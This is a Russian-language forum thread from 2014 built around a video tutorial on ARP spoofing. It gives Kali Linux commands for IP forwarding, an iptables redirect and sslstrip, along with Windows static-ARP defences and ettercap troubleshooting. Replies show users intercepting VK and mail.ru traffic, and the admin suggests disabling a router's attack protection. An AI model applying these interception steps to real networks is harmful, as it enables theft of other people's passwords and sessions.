ARP-спуфинг. Взлом, защита и описание технологии

Уязвимости, взломы и способы защиты. Вирусы здесь не обсуждаются

Модераторы: Tim308, phantom

Ответить
Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 26 апр 2014, 14:10




В этом видео я постарался подробно рассказать про так называемый ARP-спуфинг (arp-spoofing) и защиту от него. Это атака благодаря которой можно украсть пароль от сайта, перехватить cookie или сессии, скомпроментировать работу через защищенное подключение HTTPS и многое другое. В видео я использовал Kali Linux 1.0.6, ettercap-graphical, sslstrip, webspy и прочие инструменты. Вы также узнаете что такое ARP-протокол и MAC-адрес. Надеюсь что вам будет интересно!


Команды используемые в видео для KaliLinux
  1. Включаем форвардинг пакетов (ip-forwarding):

    Код: Выделить всё

    echo "1" > /proc/sys/net/ipv4/ip_forward
  2. Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 8080 порт :

    Код: Выделить всё

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. Запускаем SSLstrip на просушку заданного нами порта:

    Код: Выделить всё

    sslstrip -l 8080

Создаем статический маршрут на интерфейс. Команды для Windows
  1. Первый вариант:

    Код: Выделить всё

    arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx
  2. Если первый не сработал то вот второй вариант:

    Код: Выделить всё

    netsh interface ipv4 add neighbors "[i]Имя вашего подключения[/i]" "192.168.1.1" "xx-x-xx-xx-xx-xx"


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Репутация: 0
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 29 апр 2014, 19:38


Пробовал делать через Back track 5r3 Не сработали последние две программы

*Вложенные изображения были удалены администратором по техническим причинам.

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 29 апр 2014, 20:18


DoC17 писал(а):Пробовал делать через Back track 5r3 Не сработали последние две программы

Это можно попробовать исправить следующими командами:

Переходим в директорию с sslstrip

Код: Выделить всё

cd /pentest/web/sslstrip


Запускаем SSLStrip в среде python

Код: Выделить всё

python sslstrip.py -l 8080


PS: Кстати было-бы неплохо если бы вы вместо скриншотов указывали проделанные вам команды в виде текста. Что-бы другим пользователям было удобнее искать.


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Репутация: 0
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 30 апр 2014, 11:48


Спасибо.Заработало)))))Только правда получается слушать вконтакте и маил.ру


DoC17
Интересующийся
Сообщения: 20
Зарегистрирован: 29 апр 2014, 19:29
Репутация: 0
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DoC17 » 11 май 2014, 20:23


Ещё не всегда работает webspy, с чем это может быть связанно??

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 12 май 2014, 00:02


DoC17 писал(а):Ещё не всегда работает webspy, с чем это может быть связанно??

Без подробностей трудно сказать, но на самом деле webspy - это просто значительно упрощенный вариант программы WireShark и если насобирать логи через него (wireshark) то применив нужные фильтры в дальнейшем можно будет точно также как и в webspy узнать какие именно сайты открывались.

Но в webspy конечно все нагляднее и проще.


arp
Новичок
Сообщения: 1
Зарегистрирован: 12 май 2014, 13:26
Репутация: 0
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение arp » 12 май 2014, 14:01


Обезопасил свою сеть, а как насчет инструмента Interceptor-NG и безопасности доменных сетей, будут ролики?

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 12 май 2014, 14:57


arp писал(а):Обезопасил свою сеть

Вы прописали статический маршрут в отношении роутера или воспользовались другими вариантами? Спрашиваю потому, что если прописали маршрут, то имейте ввиду что вы защищены только от ARP-спуфинга в отношении роутера. Но при этом злоумышленник может подменить MAC-адрес другого компьютера в сети или-же удаленного сервера... Это просто к сведению.

arp писал(а):а как насчет инструмента Interceptor-NG и безопасности доменных сетей, будут ролики?

Про Intercepter-NG не уверен т.к. это еще один снифер, а про доменную сеть было-бы неплохо снять, но это сложный вопрос и с ним нужно долго разбираться что-бы получился нормальный ролик.


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 13 май 2014, 23:54


Почему может не запускаться ettercap-graphical?
Установил на виртуальную машину последнею версию кали обновил и все равно не запускается...
:?: :?: :?: :?: :?:

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 00:11


link писал(а):Почему может не запускаться ettercap-graphical?
Установил на виртуальную машину последнею версию кали обновил и все равно не запускается...
:?: :?: :?: :?: :?:

Опишите подробнее. Что именно происходит после попытки запустить?
А вообще можно пользоваться ettercap-ng из терминала, для этого пропишите команду которая выведет справку по всем командам:

Код: Выделить всё

ettercap
или

Код: Выделить всё

ettercap-ng
точно не помню...

PS: Можете попробовать еще вот эти команды, на случай если у вас вдруг повреждены эти программы:

Установка Ettercap Graphical:

Код: Выделить всё

sudo apt-get install ettercap-gtk


Установка Ettercap запускаемой из терминала:

Код: Выделить всё

sudo apt-get install ettercap


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 12:52


Я установил на виртуальную машину Kali новую попробовал запустить с меню ettercap-graphical не получилось обновился полностью... Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже... Сам по себе вопрос думаю ясен...
Что делать...
З.Ы. Пробовал Кали на английском тоже самое

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 13:02


link писал(а):Я установил на виртуальную машину Kali новую попробовал запустить с меню ettercap-graphical не получилось обновился полностью... Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже... Сам по себе вопрос думаю ясен...
Что делать...

Вы попробовали запустить не в графическом режиме а в терминальном (как я вам предлагал в предыдущем сообщении)?

link писал(а):З.Ы. Пробовал Кали на английском тоже самое

Она и так на Английском. Вы ее скачивали с оф. сайта по ссылке из первого поста?

link писал(а):Попробовал запустить опять не получилось пакеты все на месте и зависимости тоже...

Что конкретно "не получилось"? Ошибка какая-то или что?

И еще почитайте эти статьи... не знаю какую именно виртуалку вы используете, но там есть описание для VMware и VirtualBox - http://docs.kali.org/category/general-use


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 13:51


Программа в граф режиме просто не запускается
В терминале пробовал получилось но в графический интерфейс не получилось с терминала
Виртуальная машина виртуал бокс
Саму систему Кали ставил на английском

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 15:16


link писал(а):В терминале пробовал получилось

А в терминале пользоваться не вариант? Там точно такие же возможности что и в графической версии.


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 15:49


Команды надо посмотреть...
Какой командой посмотреть?)

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 14 май 2014, 16:23


link писал(а):Команды надо посмотреть...
Какой командой посмотреть?)

К абсолютному большинству команд Linux справку можно вызвать дописав после команды --help.
Например:

Код: Выделить всё

ettercap --help


А здесь статья с более конкретными примерами (имейте ввиду что регистр букв при вводе команд нужно соблюдать) - http://www.kioptrix.com/blog/ettercap-command-line-basics/


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 19:20


А Sip и skype какими инструментами ?


link
Новичок
Сообщения: 8
Зарегистрирован: 13 май 2014, 23:48
Репутация: 5
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение link » 14 май 2014, 19:49


Решил проблему сам
ettercap -G в терминале и все)


Numb
Новичок
Сообщения: 2
Зарегистрирован: 23 июн 2014, 03:59
Репутация: 0
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение Numb » 27 июн 2014, 18:00


Все как в видео , но если бы не один нюанс который не дает мне покоя ! Суть собственно говоря в чем , а вижу я только 2 объекта 1)Пк и 2)Ноутбук а 3) Маршрутизатор Tenda W268R ---нету .То есть я дошел до того момента когда сканирую сеть и у меня находит только 2 объекта , а в видео там их там 3 ! Что я делаю не так ? :?

Аватара пользователя

Автор темы
DesignerMix
Администратор
Администратор
Сообщения: 4451
Зарегистрирован: 25 апр 2014, 10:51
Есть ответ: 170
Репутация: 547
Откуда: Белгород
Контактная информация:
Статус: Не в сети

Re: ARP-спуфинг. Взлом, защита и описание технологии

Сообщение DesignerMix » 27 июн 2014, 22:26


Numb писал(а):То есть я дошел до того момента когда сканирую сеть и у меня находит только 2 объекта , а в видео там их там 3 ! Что я делаю не так ? :?

Скорее всего в вашем роутете активна функция "Предотвращение сетевых атак", привожу скриншот из инструкции к Tenda W268R
Tenda W268R Предотвращение сетевых атак.PNG


Если хотите поэксперементировать с сетью попробуйте отключить эту функцию на время. Я думаю с отключенной функцией "Prevent Network Attack" все получится.